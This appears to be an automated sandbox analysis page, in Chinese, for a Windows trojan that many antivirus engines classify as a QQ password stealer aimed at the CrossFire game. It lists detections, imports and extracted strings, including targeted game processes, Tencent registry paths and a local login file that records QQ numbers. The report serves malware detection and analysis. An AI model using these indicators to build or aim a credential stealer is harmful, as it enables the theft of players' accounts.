0.9
低危
59 个模型检测该样本为恶意!
重新分析
更多

222250ea326ff7909a06ac95f9279154ec02a1913c749bafc1593641249842f5

222250ea326ff7909a06ac95f9279154ec02a1913c749bafc1593641249842f5.exe

分析耗时

195s

最近分析

376天前

文件大小

335.0KB
静态报毒 动态报毒 CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN WIN32 TROJAN ULISE
鹰眼引擎
DACN 0.12
FACILE 1.00
IMCLNet 0.67
MFGraph 0.00
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba None 20190527 0.3.0.5
Avast Win32:PWSX-gen [Trj] 20191231 18.4.3895.0
Baidu Win32.Trojan-PSW.QQPass.ag 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_100% (D) 20190702 1.0
Kingsoft None 20191231 2013.8.14.323
McAfee PWS-FCCD!AA6D114BE601 20191231 6.0.6.653
Tencent Malware.Win32.Gencirc.10b0cc2f 20191231 1.0.0.1
静态指标
行为判定
动态指标
网络通信
与未执行 DNS 查询的主机进行通信 (2 个事件)
host 114.114.114.114
host 8.8.8.8
文件已被 VirusTotal 上 59 个反病毒引擎识别为恶意 (50 out of 59 个事件)
ALYac Gen:Variant.Ulise.44866
APEX Malicious
AVG Win32:PWSX-gen [Trj]
Acronis suspicious
Ad-Aware Gen:Variant.Ulise.44866
AhnLab-V3 Malware/Win32.Generic.C787466
Antiy-AVL Trojan[Dropper]/Win32.Dinwod.acqn
Arcabit Trojan.Ulise.DAF42
Avast Win32:PWSX-gen [Trj]
Avira TR/Crypt.XPACK.Gen3
Baidu Win32.Trojan-PSW.QQPass.ag
BitDefender Gen:Variant.Ulise.44866
BitDefenderTheta Gen:NN.ZexaF.33558.umX@ayS075o
Bkav W32.AIDetectVM.malware
CAT-QuickHeal Trojan.Qqpass.S3
ClamAV Win.Malware.Razy-6783523-0
Comodo TrojWare.Win32.PSW.QQPass.AK@5rvw8g
CrowdStrike win/malicious_confidence_100% (D)
Cybereason malicious.be6017
Cylance Unsafe
Cyren W32/S-111aedf6!Eldorado
DrWeb Trojan.DownLoader13.44529
ESET-NOD32 a variant of Win32/PSW.QQPass.OVQ
Emsisoft Gen:Variant.Ulise.44866 (B)
Endgame malicious (high confidence)
F-Prot W32/S-111aedf6!Eldorado
F-Secure Trojan.TR/Crypt.XPACK.Gen3
FireEye Generic.mg.aa6d114be601753a
Fortinet W32/GameHack.AX!tr
GData Gen:Variant.Ulise.44866
Ikarus Trojan.Win32.PSW
Invincea heuristic
Jiangmin Trojan/Scar.bexl
K7AntiVirus Password-Stealer ( 004b6c701 )
K7GW Password-Stealer ( 004b6c701 )
Kaspersky Trojan.Win32.Scar.izkq
MAX malware (ai score=86)
MaxSecure Trojan.Malware.300983.susgen
McAfee PWS-FCCD!AA6D114BE601
McAfee-GW-Edition BehavesLike.Win32.PWSZbot.fh
MicroWorld-eScan Gen:Variant.Ulise.44866
Microsoft PWS:Win32/QQPass.GP
NANO-Antivirus Trojan.Win32.QQPass.dqxdis
Panda Trj/Genetic.gen
Qihoo-360 HEUR/QVM20.1.3F61.Malware.Gen
Rising Trojan.Kryptik!1.B3E8 (CLASSIC)
Sangfor Malware
SentinelOne DFI - Malicious PE
Sophos Mal/Emogen-P
Symantec ML.Attribute.HighConfidence
可视化分析
二进制图像
数据导入图像 288x288
数据导入图像 224x224
数据导入图像 192x192
数据导入图像 160x160
数据导入图像 128x128
数据导入图像 96x96
数据导入图像 64x64
数据导入图像 32x32
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2015-04-17 23:00:27

PE Imphash

392f54ef7b2fcf975417f1d446b7c28c

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x000472d6 0x00047400 5.858782550469609
.rdata 0x00049000 0x00001b5a 0x00001c00 4.392157049408466
.data 0x0004b000 0x00016688 0x0000a600 6.101728008507946

Imports

Library KERNEL32.DLL:
0x449088 LocalSize
0x449090 MultiByteToWideChar
0x449094 WideCharToMultiByte
0x449098 MulDiv
0x44909c GlobalUnlock
0x4490a0 RtlMoveMemory
0x4490a4 GlobalFree
0x4490a8 GlobalLock
0x4490ac GlobalAlloc
0x4490b0 Module32First
0x4490b4 GetCurrentProcessId
0x4490b8 CancelWaitableTimer
0x4490bc SetWaitableTimer
0x4490c4 TerminateProcess
0x4490c8 OpenProcess
0x4490cc Process32Next
0x4490d4 CloseHandle
0x4490d8 Process32First
0x4490e0 GetModuleFileNameA
0x4490e4 TerminateThread
0x4490e8 LCMapStringA
0x4490ec LoadLibraryA
0x4490f0 GetProcAddress
0x4490f4 FreeLibrary
0x4490f8 GetTickCount
0x4490fc GetUserDefaultLCID
0x449104 lstrlenW
0x449108 WriteFile
0x44910c DeleteFileA
0x449110 CreateFileA
0x449114 GetFileSize
0x449118 ReadFile
0x44911c IsBadReadPtr
0x449120 HeapReAlloc
0x449124 ExitProcess
0x449128 GlobalSize
0x44912c HeapAlloc
0x449130 HeapFree
0x449134 GetProcessHeap
0x449138 GetModuleHandleA
Library ADVAPI32.dll:
0x449000 RegOpenKeyA
0x449004 RegQueryValueExA
0x449008 RegCloseKey
Library ATL.DLL:
0x449010 None
0x449014 None
0x449018 None
0x44901c None
Library GDI32.dll:
0x449024 BitBlt
0x449028 StretchBlt
0x44902c GetPixel
0x449030 GetStockObject
0x449034 GetObjectA
0x449038 CreateCompatibleDC
0x44903c CreateDIBSection
0x449040 DeleteDC
0x449044 CombineRgn
0x449048 CreateRoundRectRgn
0x44904c CreateSolidBrush
0x449050 CreatePatternBrush
0x449058 SetTextColor
0x44905c SetBkMode
0x449060 SetBkColor
0x449064 FillRgn
0x449068 FrameRgn
0x44906c DeleteObject
0x449070 Rectangle
0x449074 SelectObject
0x449078 CreateFontA
0x44907c ExtCreateRegion
0x449080 GetDeviceCaps
Library gdiplus.dll:
0x4493dc GdipDrawImageRect
0x4493e4 GdipDeleteGraphics
0x4493f0 GdipDeleteBrush
0x4493f4 GdipCreateSolidFill
0x449414 GdipDisposeImage
0x449418 GdiplusStartup
0x44941c GdipCreateFromHDC
0x449420 GdipDrawRectangleI
0x449424 GdipDrawRectangle
Library MSIMG32.dll:
0x449140 TransparentBlt
0x449144 AlphaBlend
Library MSVCRT.dll:
0x44914c strncmp
0x449150 sprintf
0x449154 tolower
0x449158 strncpy
0x44915c ??3@YAXPAX@Z
0x449160 atoi
0x449164 _ftol
0x449168 strrchr
0x44916c ??2@YAPAXI@Z
0x449170 floor
0x449174 strchr
0x449178 srand
0x44917c rand
0x449180 strtod
0x449184 _CIfmod
0x449188 modf
0x44918c memmove
0x449190 free
0x449194 malloc
0x449198 _strnicmp
Library ole32.dll:
0x449448 CoUninitialize
0x44944c CLSIDFromString
0x449450 StringFromGUID2
0x449458 OleRun
0x44945c CoCreateInstance
0x449460 CLSIDFromProgID
0x449464 CoInitialize
Library OLEAUT32.dll:
0x4491a0 LHashValOfNameSys
0x4491a4 VarR8FromCy
0x4491a8 VarR8FromBool
0x4491ac LoadTypeLib
0x4491b0 RegisterTypeLib
0x4491b4 SafeArrayCreate
0x4491b8 VariantChangeType
0x4491bc VariantInit
0x4491c0 SafeArrayDestroy
0x4491c4 SysAllocString
0x4491c8 VariantClear
0x4491cc SafeArrayGetDim
0x4491d0 SafeArrayGetLBound
0x4491d4 SafeArrayGetUBound
0x4491d8 SafeArrayAccessData
0x4491e4 OleLoadPicture
Library SHELL32.dll:
0x4491ec DragQueryFileA
0x4491f0 DragAcceptFiles
0x4491f4 Shell_NotifyIconA
0x4491f8 DragFinish
0x4491fc ShellExecuteA
Library SHLWAPI.dll:
0x449204 PathFileExistsA
Library USER32.dll:
0x44920c SetActiveWindow
0x449210 UnregisterHotKey
0x449214 RegisterHotKey
0x44921c DrawMenuBar
0x449220 SetMenu
0x449224 GetMenu
0x449228 GetSystemMetrics
0x44922c IsZoomed
0x449230 IsIconic
0x449234 RegisterClassExA
0x449238 FillRect
0x44923c SetClassLongA
0x449240 GetClassLongA
0x449244 SetRect
0x449248 SetWindowRgn
0x44924c LoadMenuA
0x449250 DrawIcon
0x449254 DrawIconEx
0x449258 GetIconInfo
0x44925c DrawTextA
0x449260 CreateMenu
0x449264 GetDesktopWindow
0x449268 GetWindow
0x449270 IsWindowVisible
0x449274 CreatePopupMenu
0x449278 GetSysColor
0x44927c GetWindowTextA
0x449280 GetWindowLongA
0x449284 SetWindowLongA
0x44928c CopyImage
0x449290 CopyIcon
0x449294 GetDC
0x449298 ReleaseDC
0x44929c GetMessageA
0x4492a0 GetParent
0x4492a8 IsDialogMessageA
0x4492ac DestroyMenu
0x4492b0 AppendMenuA
0x4492b4 GetMenuItemCount
0x4492b8 InsertMenuA
0x4492bc SetMenuInfo
0x4492c0 GetSubMenu
0x4492c4 GetMenuItemID
0x4492c8 CheckMenuRadioItem
0x4492cc SetForegroundWindow
0x4492d0 TrackPopupMenu
0x4492d4 GetMenuStringA
0x4492d8 GetMenuItemInfoA
0x4492dc GetMenuItemRect
0x4492e0 GetMenuState
0x4492e4 GetMenuInfo
0x4492e8 GetMenuDefaultItem
0x4492ec MenuItemFromPoint
0x4492f0 RemoveMenu
0x4492f4 CheckMenuItem
0x4492f8 wsprintfA
0x4492fc SetMenuItemInfoA
0x449300 SetMenuItemBitmaps
0x449304 SetMenuDefaultItem
0x449308 PeekMessageA
0x44930c GetSystemMenu
0x449310 RemovePropA
0x449314 GetPropA
0x449318 SetPropA
0x44931c MessageBoxA
0x449320 SetWindowTextA
0x449328 EnableWindow
0x44932c IsWindowEnabled
0x449330 ShowWindow
0x449334 SetParent
0x449338 PostMessageA
0x44933c SetWindowPos
0x449340 MoveWindow
0x449344 UpdateWindow
0x449348 ValidateRect
0x44934c InvalidateRect
0x449350 ScreenToClient
0x449354 GetWindowRect
0x449358 GetFocus
0x44935c SetFocus
0x449360 GetDlgItem
0x449364 CreateWindowExA
0x449368 DestroyCursor
0x44936c PostQuitMessage
0x449370 DestroyIcon
0x449374 TrackMouseEvent
0x449378 SetCursor
0x44937c LoadCursorA
0x449380 DefMDIChildProcA
0x449384 SendMessageA
0x449388 TranslateMessage
0x44938c DispatchMessageA
0x449390 IsWindow
0x449394 GetClassNameA
0x449398 BeginPaint
0x44939c EndPaint
0x4493a0 CallWindowProcA
0x4493a4 GetAsyncKeyState
0x4493a8 GetClientRect
0x4493ac DestroyWindow
0x4493b0 DefWindowProcA
Library WININET.dll:
0x4493bc HttpQueryInfoA
0x4493c0 InternetReadFile
0x4493c4 HttpSendRequestA
0x4493c8 HttpOpenRequestA
0x4493cc InternetConnectA
0x4493d0 InternetCloseHandle
0x4493d4 InternetOpenA
L!This program cannot be run in DOS mode.
`.rdata
@.data
(EUM]t
EEPE]t
fEm}mEU]U
EE]]M}
EEPP#X+
uRFGHt
t+t'NW:u
;uH_^UQ3
]L3hlD
uuuhxD
EP]T3h
]U3PEXAQS
]SQEHy
],SQEHy
]SQEHy
EE]E%QD
LEEP]t
LEEP]t
EE]EE]E]EWEh
E]EE]e]Eh
EE]EE]e]Eh
EEPEPAE]t
EEPEPGE]t
(EEP]S
]SQE]E%D
]]wSQEHy
%EEP]t
EE]EE]e]Euh
EE]EE]e]E
(EEP]S
(EEP]S
XE]3PEXAQS
]hSQEHy
EEPEP)
]SQEHy
]/3PEXAQS
]SQEHy
]ISQEHy
EE]E%QD
3PEXAQS
(EEP]S
XE]Z3PEXAQS
]SQEHy
E]]tM}
XEX[Yi
EE]EE]e]Eh
3PEXAQS
EEPVE]t
EEP9E]t
EE]E%D
P4EPhME
EPuhME
P4EPhME
EEPuhME
EPuhME
4EE]E%D
4EE]E%D
UE_EE%
]E]Ee]E(EE
EE]EE]M]EE]E]E
]fSQEHy
]1SQEHy
]uE]uE]uh
PLEEP]
(EUM]t
u<u4u,u$u
ub]VWS[_^Uj
]VWS[_^UP
EEPE]t
EEPEPE
EPu,-E]
]L3hlD
uuuhxD
EP]T3h
]U}3PEXAQS
}SQEHy
]|SQEHy
],|SQEHy
]{SQEHy
EE]E%QD
EE]E5QD
]EQoEeh
]eE.mPEt
EEPhME
EPEPt]t
uXt]U0
3PEXAQS
]oSQEHy
]nSQEHy
]nSQEHy
]anSQEHy
nSQEHy
]umSQEHy
]4mSQEHy
]lSQEHy
]HlSQEHy
lSQEHy
]kSQEHy
XEeuEt
EaPuh]
EEPEPf
EEPEPy}E]t
EEPh8NE
EEPh4NE
P Eh?D
]eEVPEt
EE]E5QD
]EUEeh
Pz<@PI
EPEP}EE
EPuhLNE
uuhPNE
EPuhTNE
EPEPFEj
EPuhXNE
EPEPkEj
EPEPCEj
uuh\NE
EPEPTEE
EE]E%D
]U]VWS[_^U
EPhLNE
EPhLNE
,0EEP]t
uEPGE]t
EPEP^YE
]E8hNE
EPuhLNE
uuhPNE
EPuhTNE
EPEPEj
EPEPcEj
EPuhXNE
EPEPEj
EPEP`Ej
uuh\NE
EPEPqEE
EPEP~E]
EPhLNE
EPhLNE
EEPEPDE]t
]E`$hNE
EEPhME
EEPbE]t
uEP@E]
EEPEP@E
(E]Sh0
(E]Sh0
EP]Sh0
3PEXAQS
(E]Sh0
(E]Sh0
EP]Sh0
3PEXAQS
EEPhpNE
EEPhpNE
(E]Sh0
(E]Sh0
EP]Sh0
3PEXAQS
(EEP]Sh0
VWSO[_^UhHNE
]U]VWS[_^U5]VWS[_^U`
EPEP2zEE
EPuhTNE
EPEPxEj
EPEPVxEj
EPEPwEj
[_^U?]VWS[_^VWS
VWS~[_^U
EPEPtEE
]VWSX[_^U
EPEPhME
EEPhME
EPEPSpEE
]VWS;[_^VWSO[_^UD
EEPx]t
EEPD]t
uu"gE}
EEPFfE
XEeuEt
@\P:\EE
]EP[EE
XEeuEt
EEPE]t
]E]EE]EP
]eEP]3
]e]SMu
]JS]ASh
]eEP]3
PLEEP]
3PEXAQS
ZSQEHy
JSQEHy
Euuuuu
EE3PEXAQS
E3PEXAQS
pSQEHy
0SQEHy
CSQEHy
kSQEHy
,SQEHy
]M]Evh
_SQEHy
"EEPE]t
}3PEXAQS
9SQEHy
)SQEHy
Euuuuu
PLEEP]
oEEP#E]t
3PEXAQS
HSQEHy
8SQEHy
Euuuuu
3PEXAQS
&SQEHy
Euuuuu
3PEXAQS
XSQEHy
Euuuuu
Eeuu]3
AEEPE]t
]eEPEt
3PEXAQS
]E]E%D
(EEP\E]t
]E]E%D
(EUM]t
QSQEHy
]E]E%D
(EUM]t
:SQEHy
NSQEHy
LSQEHy
2SQEHy
~SQEHy
0SQEHy
EE]E%D
]euu]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
=EeEPEt
]eEP]3
E3PEXAQS
]E]E%D
(EUMMUE
(EUMMUE
(EUMMUE
]eEP]3
]eEP]3
(EUMMUE
(EUMMUE
]E]E%oD
EE]E%oD
eEslPE
]eEP]3
]eEP]3u
]3]3]3]3
]eEP]3u
]3]3]3]3
P EeEPEPuh
P EeEPEPu]
_PE]uE]uu
Ev_PEm_P
E]uE]uu
EE]e]E5QD
]EE]e]E5QD
E]uE]uu
]E5g'E
]E]E5QD
]E]E5QD
]E]E5QD
]E]E5QD
]EE]E]E]
]EE]E]E]
]EE]E]E]
]EE]E]E]
]EE]E]E]
]EE]E]E]
]EE]E]E]
]EE]E]E]
X_^VWPh
X_^XUu
(EUM]t
UEGEE]E
(EUM]t
]e]3]3
]e]3]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
]3]3]3
E]uE]u
E]uE]u
]3]3]3
]3]3]3
E]uE]u
E]uE]u
]3]3]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
,6Eeu]
t1Eeu]
Eeu$u u
Eeu$u u
Eeu,u(u$u u
Eeu,u(u$u u
K.Eeu]
Eeu$u u
Eeu$u u
w&Eeu]
J%Eeu]
Eeuu]3
s"Eeu]
(]e]3]3h
]e]3]3]3]3u]3
Eeu$u u
Eeu$u u
Eeuu]3
Eeuu]3
h;EEP]t
9EEP]t
3PEXAQS
e6EEP]t
3PEXAQS
YPQu]dZ
3PEXAQS
]$SQEHy
Ee]FSu
YPQu]
3PEXAQS
]]SQEHy
&0EEP]t
]eEP]3
u E]uE]uh
Eeu(u$u u
Eeu(u$u u
uu0u,u(u$u u
uu0u,u(u$u u
uu8u4u0u,u(h
uu8u4u0u,u(h
Eeuu u
Eeuu u
Eeuu u
Eeuu u
Eeuu u
Eeuu u
]eEP]3
]eEP]3
]eEP]3
]eEP]3
]eEP]3
P]S}W?S
]e]3]3
]eu]3
u8u0u(u ]3/
eu(u$u u
uHu@u8u0]3/
eu0u,u(u$u u
uPu(u u
uHu@u8u0]31
(EUMMUE
Eeuu,u(u$u u
uPu(u u
uHu@u8u0]31
eu0u,u(u$u u
eu0u,u(u$u u
Y^_^VWt
Y^_^VWt
Y^_^VWt
Y^_^VWt
Y^_^VWt
^PVWPh
X_^VWPh
EP]3hNE
EPuhNE
EP]3hNE
EP]3hNE
EE3PEXAQS
XEE]E%D
l]e]3h
l]e]3h
E,PEqP
]eu]<3E^P
]eu]T3EP
]eu]d3E
l]e]3h
]e]3hu
Eeu45NE
u,u(u$u u]
VEeuhu
]EE]EsE}
EP]3hNE
uu]3hNE
]]3u(}
uu]3hNE
]]3=}EE
]e]E#eE
]e]EdE$]
]eu,u$u
EbPEbP]3u
E`PE`Pu
]3]3]3
E\P]3]3]3
Eeuh]3
Eeuh]3
Eeuh]3
Eeuh]3
]EnREh
]euu]3
EE]E%D
P]S}W?S
u]3]3h
EE]E%D
]E]EEE
]EE]e]]
]EE]e]E
x5DPuE)DPu
]EE]e]]
]EE]e]ERC]
]EE]e]E
]EE]e]E
P]S}W?S
MeEPh>
P]S}W?S
E;PE;Ph
X]e]3]
X]e]3]
`]e]3u
]e]eh
uE4PE4P]3]3u
X]e]3]
`]e]3u
`]eEPh
u]3]3]3]3u
uDu<u4u,u
EEP]S#
]e]E+]
]e]EE+]
]e]E]Ee]E5QD
]e]E]Ee]E5QD
P Eeuu
t]eh)E
l]e]3h
l]e]3h
l]e]3h
l]e]3h
l]e]3h
E,]UEE
E4]UEE
E<E<}H
EDED}P
ELEL}
Eeuh)E
]]eh)E
eE]uE]uh
eEPEPu
E]EEE]EE
EPEPuuE2
E]EEE]EEE]Ee]E5QD
EE]Ee]E5QD
EeuuE]uE]uuu
]M]EE]u]E]
]M]EE]u]E7]
t*SW375
]e]3]3
E]]]]]
]e]EE$]
]euu$u
X]]]3u
]e]EEu
]e]E5E]
]e]EE}
eE]uE]uh
eEPEPu
E]EEE]EE
EPEPuuEPEPE]EEE]EEE]Ee]E5QD
]E}EE]Ee]E5QD
]EWEeuuE]uE]uuu
E]]]]]
]EE]EW]
eEiP]3]SM
t]EPlEEE
]EPa@EE
]EP>E]d
]3]3D!
]3]3sC
]EP6<E]
]EP:EE
]3]3n@]SR
d]]3hNE
p]e]3]
E(E(}4
E0E0}D
uuu0u(u u
EEPu@u
X]e]3u
X]e]3u
`]uN:]
uu]3hNE
XEhU+E
(E]Sh0
(E]Sh0
3.EE]E
]EuP|.EE
(E]Sh0
(E]Sh0
(EEP]Sh0
Y^_^VWt
]e]eh
uE~PEuPh
h]eu]3]3h
EPEP]3]3@
eu]3]3h
u]3]3]3]3]3
]3]3]3]3]3]3
]e]Ew]
]e]E0]
]e]E5QD
]EE]E]
]e]E5QD
]EE]Eb]
l]e]3uu
E(E(}4
uuu0u(u u
EEPu8u
X]eEPh
X]eu]3
X]e]3u
]e]]]]
]3]3uE=PE4Ph
X]e]3u
\]e]3u
u0u,u(u$u u
E0E0}<
E8E8}D
4E-Pu8u0u(u uu
EEPu@u
]u]3]3u
[\]e]3
EEP]S0z
l]e]3]3E
E8E8}D
u@u8u0u(uu
EEPuPu
EEP]S*w
l]e]3]3E7~PE.~Ph
{PE{Pu
zPEzPh
GwPE>wP]3]3u
guPE^uP]3]3u
l]]3]3]3]3ErPErP
[\ ]];
(Eeuuhuu
oPEoPh
[\]e]3
SPkZ[\S
LEEP]t
PwN@P[
P]M@PZ
(EEP]Sh0
(EEP]t
4EE]E%D
PI@P'W
EP]Sh0
(EEP]Sh0
4EE]E%D
P}F@PS
(E]Sh0
(EU]Sh0
^PVWPh
X_^VWPh
X_^VWt
Y^_^XU
EE]EE]M]EE]E
ZSQEHy
]ESEE9E
YSQEHy
YSQEHy
dYSQEHy
]E@RPu
3PEXAQS
WSQEHy
MWSQEHy
]EHPE}
EE]fVSQEHy
]EnOEE9E
B]USQEHy
iUSQEHy
]%USQEHy
TSQEHy
]TSQEHy
ZTSQEHy
]EPSX+QSP
PVWQPh
Y^Y_^I
QSQEHy
QSQEHy
]EJEE9E
PSQEHy
QPSQEHy
NSQEHy
]EGEE9E
NSQEHy
MSQEHy
MSQEHy
3PEXAQS
IKSQEHy
JSQEHy
?JSQEHy
3PEXAQS
ISQEHy
HSQEHy
FSQEHy
]E?EE9E
FSQEHy
^PVWPaEX+QSP
PVWQPh
Y^Y_^I
]eEP]3
Eeuu]3
Eeuu]3
]eEP]3
EeEPu]3
EeEPu]3
EeEPu]3
EeEPuu]3
EeEPu]3]3]3
EeEPu]3]3]3
EeEPu]3]3]3]3]3
EeEPu]3]3]3]3]3
EeuEP]3
EeuEP]3
EeuEP]3
Eeuuu]3
Eeuuuu
EUEo#h
Eeuuuu
]eu]3u
^PVWPM
PVWQPh
Y^Y_^I
X_^X@&7h
PQhHSE
3;wO;5hTE
W3I_L$
3tESL$
VW3|$$I
5t(D$<
*t.;w"T$$WRVF
F;v_^][;wD$$WPV
F;v_^][
_+^]@[
UVW3l$$I
D$<t ;r
t-N;s_^][;rWUV
N;s_^][
_+^]@[
W3It4D$ ~,;}
^[_^3[
Wui%=
t-t)AQL
F;r[_^]
EUM_^]
+;E|w;~s}
uSEVPU
EUM[_^]
S\$,UVW3|$
IIt$8L$
T$8t-IL$
t"D$8CHD$8D$8CHD$8D$
t$,l$$
$SUl$4VW3|$H3II;
t$(\$ u
_^][$;
D$\T$$;
|$T3|$$IL$
L$`9T$tu
L$,L$x3;
L$HSQV8
T$HSRV8
D$0@P|$0D$
D$HSPW7
uG+SUV7
rL$0D$
T$<D$(+;
D$HSPW7
uG+SUV;7
rL$0D$
T$<D$(+;
VW3ItK\$0~Ct$$~;;
][_^]3[
W3ItLL$
_^3_^=
t-< t)j
WUl$(U
SUVWP/
3IQVN(
u0D$Ht2T$@t*3IQR'
l$@L$(
D$$SWVURP
L$,T$ PD$
SUVWtjl$(tbB
@;v_^][Y_+^]@[Y
L$ QVS
^][WV7
L$(VPQ
0D$8SWD$
L$ D$,3T$(T$$D$
L$0D$ T$4h
L$,PT$ QRD$4
43SD$(UD$0VD$8W|$XD$@D$P|$<
L$$D$@
L$8\$H
FfP,;|
3f9z.vk\$LD$
FfA.;|+fA
T$<D$X
tf|$P
t!f|$P
\$L|$\
T$TL$(
RT$\L$@QL$\Rj
QSD$LP
D$PD$<
~||$\\$X-
KuD$4PT
$SUVW|$<3
_^]3[$
Ul$$Ul$ UPVQR,uPf|$
PQ@u$D$Tj\PY
zT$$RV
_^]3[$
L$$PhD
_^]3[$
MUPEUURj
EUEjUE
EU^]5fD
uYL$$T$
T$0RQL$
T$,RPD$
udD$ H
uYL$$T$
T$0RQL$
UEPQR"
MUPEUURj
EUEjUE
T$(t6~2L$
_^_3^UE
ty3ItkA
W3I_t!D$
uIWUT$
SVD$,WPQR
\$4D$(L$
PD$<T$$QL$<RPQM
T$@D$8RT$XL$HPD$XQRP
u0|$83$
D$ RT$
QL$ RT$0PQM
Fd;r,d
3_]WPQE
A+EYX_E_]
t3SVt$
_^[3~,> t
D$ hPTE
L$(UhLTE
3IQSSl
D$ D$(D$,D$4D$<T$
T$$T$0T$8
L$DT$H@
D$@L$D
SUVW|$,33D$(t$
;w/L$,UQWe
|$03I|$
L$,UQW
D$0RPV
G;|$ v-;|$ w'3+|$
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
gdiplus.dll
MSIMG32.dll
MSVCRT.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
LocalSize
GetWindowsDirectoryA
MultiByteToWideChar
WideCharToMultiByte
MulDiv
GlobalUnlock
RtlMoveMemory
GlobalFree
GlobalLock
GlobalAlloc
Module32First
GetCurrentProcessId
CancelWaitableTimer
SetWaitableTimer
CreateWaitableTimerA
TerminateProcess
OpenProcess
Process32Next
GetPrivateProfileStringA
CloseHandle
Process32First
CreateToolhelp32Snapshot
GetModuleFileNameA
TerminateThread
LCMapStringA
LoadLibraryA
GetProcAddress
FreeLibrary
GetTickCount
GetUserDefaultLCID
WritePrivateProfileStringA
lstrlenW
WriteFile
DeleteFileA
CreateFileA
GetFileSize
ReadFile
IsBadReadPtr
HeapReAlloc
ExitProcess
GlobalSize
HeapAlloc
HeapFree
GetProcessHeap
GetModuleHandleA
RegOpenKeyA
RegQueryValueExA
RegCloseKey
BitBlt
StretchBlt
GetPixel
GetStockObject
GetObjectA
CreateCompatibleDC
CreateDIBSection
DeleteDC
CombineRgn
CreateRoundRectRgn
CreateSolidBrush
CreatePatternBrush
CreateCompatibleBitmap
SetTextColor
SetBkMode
SetBkColor
FillRgn
FrameRgn
DeleteObject
Rectangle
SelectObject
CreateFontA
ExtCreateRegion
GetDeviceCaps
GdipDrawImageRect
GdipGetImageDimension
GdipDeleteGraphics
GdipLoadImageFromStream
GdipImageSelectActiveFrame
GdipDeleteBrush
GdipCreateSolidFill
GdipCreateBitmapFromHBITMAP
GdipGetImageRawFormat
GdipSaveImageToStream
GdipGetImageEncoders
GdipGetImageEncodersSize
GdipCreateBitmapFromStream
GdipCreateBitmapFromStreamICM
GdipDisposeImage
GdiplusStartup
GdipCreateFromHDC
GdipDrawRectangleI
GdipDrawRectangle
GdipGetTextRenderingHint
GdipSetTextRenderingHint
GdipGetSmoothingMode
GdipSetSmoothingMode
GdipGetImageGraphicsContext
GdipSetWorldTransform
TransparentBlt
AlphaBlend
strncmp
sprintf
tolower
strncpy
??3@YAXPAX@Z
strrchr
??2@YAPAXI@Z
strchr
strtod
_CIfmod
memmove
malloc
_strnicmp
CreateStreamOnHGlobal
CoUninitialize
CLSIDFromString
StringFromGUID2
GetHGlobalFromStream
OleRun
CoCreateInstance
CLSIDFromProgID
CoInitialize
DragQueryFileA
DragAcceptFiles
Shell_NotifyIconA
DragFinish
ShellExecuteA
PathFileExistsA
SetActiveWindow
UnregisterHotKey
RegisterHotKey
RegisterWindowMessageA
DrawMenuBar
SetMenu
GetMenu
GetSystemMetrics
IsZoomed
IsIconic
RegisterClassExA
FillRect
SetClassLongA
GetClassLongA
SetRect
SetWindowRgn
LoadMenuA
DrawIcon
DrawIconEx
GetIconInfo
DrawTextA
CreateMenu
GetDesktopWindow
GetWindow
GetWindowThreadProcessId
IsWindowVisible
CreatePopupMenu
GetSysColor
GetWindowTextA
GetWindowLongA
SetWindowLongA
SetLayeredWindowAttributes
CopyImage
CopyIcon
ReleaseDC
GetMessageA
GetParent
TranslateAcceleratorA
IsDialogMessageA
DestroyMenu
AppendMenuA
GetMenuItemCount
InsertMenuA
SetMenuInfo
GetSubMenu
GetMenuItemID
CheckMenuRadioItem
SetForegroundWindow
TrackPopupMenu
GetMenuStringA
GetMenuItemInfoA
GetMenuItemRect
GetMenuState
GetMenuInfo
GetMenuDefaultItem
MenuItemFromPoint
RemoveMenu
CheckMenuItem
wsprintfA
SetMenuItemInfoA
SetMenuItemBitmaps
SetMenuDefaultItem
PeekMessageA
GetSystemMenu
RemovePropA
GetPropA
SetPropA
MessageBoxA
SetWindowTextA
GetWindowTextLengthA
EnableWindow
IsWindowEnabled
ShowWindow
SetParent
PostMessageA
SetWindowPos
MoveWindow
UpdateWindow
ValidateRect
InvalidateRect
ScreenToClient
GetWindowRect
GetFocus
SetFocus
GetDlgItem
CreateWindowExA
DestroyCursor
PostQuitMessage
DestroyIcon
TrackMouseEvent
SetCursor
LoadCursorA
DefMDIChildProcA
SendMessageA
TranslateMessage
DispatchMessageA
IsWindow
GetClassNameA
BeginPaint
EndPaint
CallWindowProcA
GetAsyncKeyState
GetClientRect
DestroyWindow
DefWindowProcA
MsgWaitForMultipleObjects
HttpQueryInfoA
InternetReadFile
HttpSendRequestA
HttpOpenRequestA
InternetConnectA
InternetCloseHandle
InternetOpenA
CrackMe
Sysceam
crossfire.exe
Client.exe
TASLogin.exe
TenioDL.exe
Syscaem
http://i2.tietuku.com/e8f28e466c583ca1.jpg
cpath.ini
wb.dat
User-Agent:
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP/1.1
Referer:
Referer:
Referer:
Accept:
Accept: */*
Accept-Language:
Accept-Language: zh-cn
Content-Type:
Content-Type: application/x-www-form-urlencoded
Cookie:
Location:
Set-Cookie
Set-Cookie:
@ Moved
HTTP/1.1
https://
http://
?=deleted
Software\Tencent\CrossFire\InstallPath
Software\Tencent\CrossFire\Path
c1.dat
gIoMoMqKvDkBjCvItKrMkA9KAUrIeKtMkA9KiMlAbKnMbIcKhEaInKgEiIqKbM
c2.dat
\TCLS\music\1.html
<embed autoplay="true" src="sound.mp3" width="1" height="1" />
http://cf.qq.com/other/cilent/index2.shtml
\TCLS\config\LoginQ.dat
LastQQUin
Public
Verdana
Wingdings
